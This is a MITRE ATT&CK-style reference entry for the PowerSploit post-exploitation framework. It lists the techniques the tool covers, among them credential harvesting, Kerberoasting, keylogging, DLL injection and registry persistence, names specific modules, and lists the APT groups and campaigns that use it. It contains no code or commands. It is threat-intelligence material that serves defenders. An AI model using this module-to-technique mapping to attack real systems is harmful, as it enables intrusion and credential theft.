1. Home
  2. Software
  3. PowerSploit

PowerSploit

PowerSploit is an open source, offensive security framework comprised of PowerShell modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. [1] [2] [3]

ID: S0194
Type: TOOL
Platforms: Windows
Version: 1.6
Created: 18 April 2018
Last Modified: 17 August 2023
Enterprise Layer
download view

Techniques Used

Domain ID Name Use
Enterprise T1047 Windows管理规范

PowerSploit's Invoke-WmiCommand CodeExecution module uses WMI to execute and retrieve the output from a PowerShell payload.[1][3]
Enterprise T1555 .004 从密码存储中获取凭证: Windows Credential Manager

PowerSploit contains a collection of Exfiltration modules that can harvest credentials from Windows vault credential objects.[1][3]
Enterprise T1005 从本地系统获取数据

PowerSploit contains a collection of Exfiltration modules that can access data from local files, volumes, and processes.[1][3]
Enterprise T1543 .003 创建或修改系统进程: Windows Service

PowerSploit contains a collection of Privesc-PowerUp modules that can discover and replace/modify service binaries, paths, and configs.[1][3]
Enterprise T1574 .001 劫持执行流: DLL Search Order Hijacking

PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit DLL hijacking opportunities in services and processes.[1][3]
.007 劫持执行流: Path Interception by PATH Environment Variable

PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit path interception opportunities in the PATH environment variable.[1][3]
.008 劫持执行流: Path Interception by Search Order Hijacking

PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit search order hijacking vulnerabilities.[1][3]
.009 劫持执行流: Path Interception by Unquoted Path

PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit unquoted path vulnerabilities.[1][3]
Enterprise T1620 反射性代码加载

PowerSploit reflectively loads a Windows PE file into a process.[1][3]
Enterprise T1547 .001 启动或登录自动启动执行: Registry Run Keys / Startup Folder

PowerSploit's New-UserPersistenceOption Persistence argument can be used to establish via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry key.[1][3]
.005 启动或登录自动启动执行: Security Support Provider

PowerSploit's Install-SSP Persistence module can be used to establish by installing a SSP DLL.[1][3]
Enterprise T1059 .001 命令与脚本解释器: PowerShell

PowerSploit modules are written in and executed via PowerShell.[1][3]
Enterprise T1482 域信任发现

PowerSploit has modules such as Get-NetDomainTrust and Get-NetForestTrust to enumerate domain and forest trusts.[1][3]
Enterprise T1113 屏幕捕获

PowerSploit's Get-TimedScreenshot Exfiltration module can take screenshots at regular intervals.[1][3]
Enterprise T1003 .001 操作系统凭证转储: LSASS Memory

PowerSploit contains a collection of Exfiltration modules that can harvest credentials using Mimikatz.[1][3]
Enterprise T1552 .002 未加密凭证: Credentials in Registry

PowerSploit has several modules that search the Windows Registry for stored credentials: Get-UnattendedInstallFile, Get-Webconfig, Get-ApplicationHost, Get-SiteListPassword, Get-CachedGPPPassword, and Get-RegistryAutoLogon.[4]
.006 未加密凭证: Group Policy Preferences

PowerSploit contains a collection of Exfiltration modules that can harvest credentials from Group Policy Preferences.[1][3]
Enterprise T1012 查询注册表

PowerSploit contains a collection of Privesc-PowerUp modules that can query Registry keys for potential opportunities.[1][3]
Enterprise T1027 .005 混淆文件或信息: Indicator Removal from Tools

PowerSploit's Find-AVSignature AntivirusBypass module can be used to locate single byte anti-virus signatures.[1][3]
.010 混淆文件或信息: Command Obfuscation

PowerSploit contains a collection of ScriptModification modules that compress and encode scripts and payloads.[1][3]
Enterprise T1558 .003 窃取或伪造Kerberos票据: Kerberoasting

PowerSploit's Invoke-Kerberoast module can request service tickets and return crackable ticket hashes.[5][6]
Enterprise T1134 访问令牌操控

PowerSploit's Invoke-TokenManipulation Exfiltration module can be used to manipulate tokens.[1][3]
Enterprise T1087 .001 账号发现: Local Account

PowerSploit's Get-ProcessTokenGroup Privesc-PowerUp module can enumerate all SIDs associated with its current token.[1][3]
Enterprise T1056 .001 输入捕获: Keylogging

PowerSploit's Get-Keystrokes Exfiltration module can log keystrokes.[1][3]
Enterprise T1057 进程发现

PowerSploit's Get-ProcessTokenPrivilege Privesc-PowerUp module can enumerate privileges for a given process.[1][3]
Enterprise T1055 .001 进程注入: Dynamic-link Library Injection

PowerSploit contains a collection of CodeExecution modules that inject code (DLL, shellcode) into a process.[1][3]
Enterprise T1123 音频捕获

PowerSploit's Get-MicrophoneAudio Exfiltration module can record system microphone audio.[1][3]
Enterprise T1053 .005 预定任务/作业: Scheduled Task

PowerSploit's New-UserPersistenceOption Persistence argument can be used to establish via a Scheduled Task/Job.[1][3]

Groups That Use This Software

ID Name References
G0064 APT33

[7]
G1006 Earth Lusca

[8]
G0096 APT41

[9]
G0069 MuddyWater

[10]
G0046 FIN7

[11][12]
G0045 menuPass

[13]
G0065 Leviathan

[14]
G0092 TA505

[15]
G0040 Patchwork

[16]

Campaigns

ID Name Description
C0004 CostaRicto

During CostaRicto, threat actors used PowerSploit's Invoke-ReflectivePEInjection module.[17]
C0014 Operation Wocao

During Operation Wocao, threat actors used PowerSploit’s Invoke-Kerberoast module to bruteforce passwords and retrieve encrypted service tickets.[18]

References

  1. PowerShellMafia. (2012, May 26). PowerSploit - A PowerShell Post-Exploitation Framework. Retrieved February 6, 2018.
  2. Graeber, M. (2014, July 8). PowerSploit. Retrieved February 6, 2018.
  3. PowerSploit. (n.d.). PowerSploit. Retrieved February 6, 2018.
  4. netbiosX. (2017, April 19). Stored Credentials. Retrieved April 6, 2018.
  5. Schroeder, W. & Hart M. (2016, October 31). Invoke-Kerberoast. Retrieved March 23, 2018.
  6. Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz. Retrieved September 23, 2024.
  7. Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019.
  8. Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.
  9. Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.
  1. Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020.
  2. Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.
  3. Abdo, B., et al. (2022, April 4). FIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7. Retrieved April 5, 2022.
  4. PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017.
  5. CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department. Retrieved August 12, 2021.
  6. Terefos, A. (2020, November 18). TA505: A Brief History of Their Time. Retrieved July 14, 2022.
  7. Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016.
  8. The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021.
  9. Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020.